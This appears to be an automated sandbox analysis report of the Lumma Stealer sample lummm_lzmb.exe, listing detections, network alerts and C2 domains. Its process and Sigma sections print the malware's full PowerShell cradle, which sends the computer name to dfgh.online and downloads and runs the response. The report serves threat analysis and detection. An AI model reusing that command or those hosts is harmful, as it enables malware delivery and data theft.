Edit tour

Windows Analysis Report
lummm_lzmb.exe

Overview

General Information

Sample name:	lummm_lzmb.exe
Analysis ID:	1592036
MD5:	0df5f44040c57cb4f63f442ae2c8d904
SHA1:	bffeae3a0bbb2a4cc801072cf6c7d8a1a0757e43
SHA256:	06384a97225d303a36c0fe0bc6f49e6d03dce0bc5f437ae8ac8a4a432ff68b61
Tags:	exeLummaStealeruser-threatcat_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

lummm_lzmb.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\lummm_lzmb.exe" MD5: 0DF5F44040C57CB4F63F442AE2C8D904)

lummm_lzmb.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\lummm_lzmb.exe" MD5: 0DF5F44040C57CB4F63F442AE2C8D904)

powershell.exe (PID: 2004 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["leggelatez.lat", "savorraiykj.lat", "bloodyswif.lat", "washyceehsu.lat", "shoefeatthe.lat", "miniatureyu.lat", "kickykiduz.lat", "burnressert.shop", "finickypwk.lat"], "Build id": "jMw1IE--SHELLS"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1730312615.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: lummm_lzmb.exe PID: 6348	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: lummm_lzmb.exe PID: 6348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lummm_lzmb.exe PID: 6780	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.lummm_lzmb.exe.6bd0000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.lummm_lzmb.exe.6bd0000.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lummm_lzmb.exe", ParentImage: C:\Users\user\Desktop\lummm_lzmb.exe, ParentProcessId: 6780, ParentProcessName: lummm_lzmb.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lummm_lzmb.exe", ParentImage: C:\Users\user\Desktop\lummm_lzmb.exe, ParentProcessId: 6780, ParentProcessName: lummm_lzmb.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lummm_lzmb.exe", ParentImage: C:\Users\user\Desktop\lummm_lzmb.exe, ParentProcessId: 6780, ParentProcessName: lummm_lzmb.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lummm_lzmb.exe", ParentImage: C:\Users\user\Desktop\lummm_lzmb.exe, ParentProcessId: 6780, ParentProcessName: lummm_lzmb.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lummm_lzmb.exe", ParentImage: C:\Users\user\Desktop\lummm_lzmb.exe, ParentProcessId: 6780, ParentProcessName: lummm_lzmb.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }, ProcessId: 2004, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T17:25:03.578268+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.67.165	443	TCP
2025-01-15T17:25:05.376551+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.67.165	443	TCP
2025-01-15T17:25:06.606294+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.67.165	443	TCP
2025-01-15T17:25:20.057656+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.67.165	443	TCP
2025-01-15T17:25:21.112577+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.67.165	443	TCP
2025-01-15T17:25:22.736822+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.67.165	443	TCP
2025-01-15T17:25:23.654243+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.67.165	443	TCP
2025-01-15T17:25:24.830182+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.67.165	443	TCP
2025-01-15T17:25:26.246543+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	185.161.251.21	443	TCP
2025-01-15T17:25:27.030690+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.15.122	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T17:25:04.096224+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.67.165	443	TCP
2025-01-15T17:25:05.906464+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.67.165	443	TCP
2025-01-15T17:25:25.294634+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	104.21.67.165	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T17:25:04.096224+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.67.165	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T17:25:05.906464+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.67.165	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T17:25:19.211554+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.67.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/8574262446/ph.txt4l	Avira URL Cloud: Label: malware
Source: https://burnressert.shop/api	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtnbF3	Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=hZ	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.lummm_lzmb.exe.7b0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["leggelatez.lat", "savorraiykj.lat", "bloodyswif.lat", "washyceehsu.lat", "shoefeatthe.lat", "miniatureyu.lat", "kickykiduz.lat", "burnressert.shop", "finickypwk.lat"], "Build id": "jMw1IE--SHELLS"}

Multi AV Scanner detection for submitted file

Source: lummm_lzmb.exe

Virustotal: Detection: 16%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lummm_lzmb.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: burnressert.shop
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1723635438.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jMw1IE--SHELLS

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007C7FA6 CryptUnprotectData,

1_2_007C7FA6

Source: lummm_lzmb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.78.33:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: lummm_lzmb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: lummm_lzmb.exe, 00000000.00000002.1731278954.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: lummm_lzmb.exe, 00000000.00000002.1731278954.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\SolidDocuments	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [edi], ax	1_2_007EF079
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh	1_2_007EA000
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov eax, edx	1_2_007EA140
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-618A1FB8h]	1_2_007DD9A2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_007DD9A2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0F8062AEh]	1_2_007D7C70
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000001A4h]	1_2_007B9C80
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007D0D10
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov esi, ecx	1_2_007F0ED0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	1_2_007D4F7F
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov esi, ecx	1_2_007D4F7F
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000218h]	1_2_007BE709
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	1_2_007BD879
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ebx, eax	1_2_007B5860
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ebp, eax	1_2_007B5860
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_007DE063
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	1_2_007ED800
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then push dword ptr [esp+0Ch]	1_2_007BD093
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then lea esi, dword ptr [ecx+ecx]	1_2_007CA880
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50C386E1h]	1_2_007D8150
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_007DD1A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-5A10DF94h]	1_2_007EF9A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_007D999F
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then jmp ecx	1_2_007D5990
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then test esi, esi	1_2_007EB180
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+08h]	1_2_007F1270
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ebx, eax	1_2_007C7AA7
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-23C15DBAh]	1_2_007F0370
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then jmp ecx	1_2_007D5B00
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+00001118h]	1_2_007B73C0
